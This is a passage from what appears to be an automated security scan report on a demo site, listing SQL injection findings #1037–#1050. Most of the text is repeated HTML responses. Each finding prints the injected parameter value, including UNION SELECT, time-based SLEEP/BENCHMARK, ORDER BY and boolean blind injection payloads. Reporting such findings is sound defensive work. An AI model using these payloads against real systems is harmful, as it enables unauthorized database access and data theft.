src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1037\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1038\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A'))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1039\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1040Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or (('x'))=(('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1041\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1042\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1043\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1044\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) \nAND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1045\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1046\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1047\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 3409=3409 AND ('pytW' LIKE 'pytY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1048\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,1,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1049\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1050\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 3409=3409 AND ('pytW' LIKE 'pytW\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap 